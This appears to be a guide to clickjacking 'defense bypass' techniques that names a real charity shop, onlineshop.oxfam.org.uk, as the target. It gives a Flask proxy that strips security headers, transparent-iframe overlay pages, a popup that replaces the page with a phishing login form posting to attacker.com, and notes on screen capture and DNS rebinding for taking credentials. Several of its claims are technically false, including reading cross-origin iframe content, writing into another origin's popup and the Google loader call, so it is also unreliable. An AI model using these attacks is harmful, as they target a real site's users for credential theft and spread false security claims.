Defense bypass for clickjacks
Here are multiple Clickjacking bypass techniques, categorized based on the defenses in place. These include proxy-based bypasses, browser exploits, iframe techniques, JavaScript tricks, and UI redressing.
- Bypassing X-Frame-Options Using a Proxy
Most sites block Clickjacking with X-Frame-Options: DENY or X-Frame-Options: SAMEORIGIN. The simplest way to bypass this is to strip headers using a proxy.
Flask-Based Proxy (Strips Security Headers)
from flask import Flask, request, Response
import requests
app = Flask(__name__)
TARGET_URL = "https://onlineshop.oxfam.org.uk"
@app.route("/", defaults={"path": ""})
@app.route("/<path:path>")
def proxy(path):
url = f"{TARGET_URL}/{path}"
headers = {key: value for key, value in request.headers.items() if key != "Host"}
resp = requests.get(url, headers=headers)
# Remove security headers
excluded_headers = ["Content-Security-Policy", "X-Frame-Options"]
response_headers = [(key, value) for key, value in resp.headers.items() if key not in excluded_headers]
response = Response(resp.content, resp.status_code)
for key, value in response_headers:
response.headers[key] = value
return response
if __name__ == "__main__":
app.run(host="0.0.0.0", port=8080, debug=True)How to Use It
- Run the script:
python3 proxy.py
- Modify your PoC:
<iframe src="http://localhost:8080"></iframe>
This removes X-Frame-Options and allows embedding.
- Bypassing frame-ancestors CSP with sandbox
If CSP blocks embedding (frame-ancestors 'none'), but sandboxing is allowed, try this:
<iframe src="https://onlineshop.oxfam.org.uk" sandbox="allow-forms allow-scripts"></iframe>
This allows forms and scripts but prevents full control.
- Clickjacking via Drag-and-Drop (CSS/UI Redressing)
Even if X-Frame-Options is enforced, you can overlay elements and trick users into dragging elements over a hidden button.
<style>
iframe {
opacity: 0.01;
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
pointer-events: none;
}
.fake-button {
position: absolute;
top: 50%;
left: 50%;
width: 200px;
height: 50px;
background: red;
cursor: pointer;
}
</style>
<iframe src="https://onlineshop.oxfam.org.uk"></iframe>
<div class="fake-button" onmousedown="moveIframe()">Click here</div>
<script>
function moveIframe() {
let iframe = document.querySelector("iframe");
iframe.style.pointerEvents = "auto";
iframe.style.opacity = 1;
}
</script>
How it Works
-
The iframe is transparent and doesn’t capture clicks.
-
The user drags the "Click here" button, accidentally clicking on a hidden "Buy Now" or "Login" button inside the iframe.
- CSS Layering Attack (Opacity Trick)
<style>
iframe {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
opacity: 0.1;
}
.fake-content {
position: absolute;
top: 50%;
left: 50%;
background: red;
width: 200px;
height: 50px;
cursor: pointer;
}
</style>
<iframe src="https://onlineshop.oxfam.org.uk"></iframe>
<div class="fake-content" onclick="alert('Hacked!')">Click here</div>
How it Works
The real iframe is almost invisible.
The user sees only the fake button.
Clicking it actually clicks something inside the iframe.
- JavaScript Content Extraction
If the site uses JavaScript-based UI security, extract the content dynamically using a hidden iframe.
<iframe src="https://onlineshop.oxfam.org.uk" id="target"></iframe>
<script>
document.getElementById('target').onload = function() {
let iframe = document.getElementById('target').contentWindow.document.body.innerHTML;
console.log(iframe);
};
</script>
How it Works
-
Loads the target page inside an iframe.
-
Extracts its content (useful for phishing or HTML injection attacks).
- window.open() Popup Hijacking
Some sites block iframe usage, but allow pop-ups. You can:
Open a popup.
Overwrite document.body.innerHTML to inject malicious forms.
<button onclick="openPhishingWindow()">Click Me</button>
<script>
function openPhishingWindow() {
let win = window.open("https://onlineshop.oxfam.org.uk", "_blank");
setTimeout(() => {
win.document.body.innerHTML = `<h1>Login Required</h1><form action='http://attacker.com'><input type='text' name='user'><input type='password' name='pass'><input type='submit'></form>`;
}, 2000);
}
</script>
How it Works
-
Opens Oxfam in a new tab.
-
Waits 2 seconds, then replaces the page with a phishing form.
- WebRTC Screen Capture Attack
If the user has allowed screen recording, you can use WebRTC to capture their session.
<script>
navigator.mediaDevices.getDisplayMedia({video: true}).then(stream => {
let video = document.createElement("video");
document.body.appendChild(video);
video.srcObject = stream;
video.play();
});
</script>
How it Works
Requests screen recording.
Displays the victim’s screen in real-time.
Useful for capturing login credentials.
- DNS Rebinding Attack
If Oxfam has an open API, and the user is logged in, use DNS Rebinding:
-
Set up a malicious DNS server.
-
Point the domain to 127.0.0.1 for authenticated requests.
-
Send requests as if you were the victim.
- Bypassing CSP with Trusted Domains
If the CSP allows *.google.com, but blocks direct requests, inject JavaScript via Google APIs.
<script src="https://google.com/jsapi"></script>
<script>
google.load("website", "1", {callback: () => {
document.body.innerHTML += `<iframe src='https://onlineshop.oxfam.org.uk'></iframe>`;
}});
</script>
How it Works
Uses Google as a trusted source.
Executes code that loads Oxfam in an iframe.
Final Thoughts
If X-Frame-Options is set: Use a proxy to strip headers.
If CSP blocks frames: Use sandboxing, click overlays, or DNS rebinding.
If JavaScript security is used: Use iframe extraction, popup hijacking, or phishing.
If screen capture is possible: Use WebRTC recording.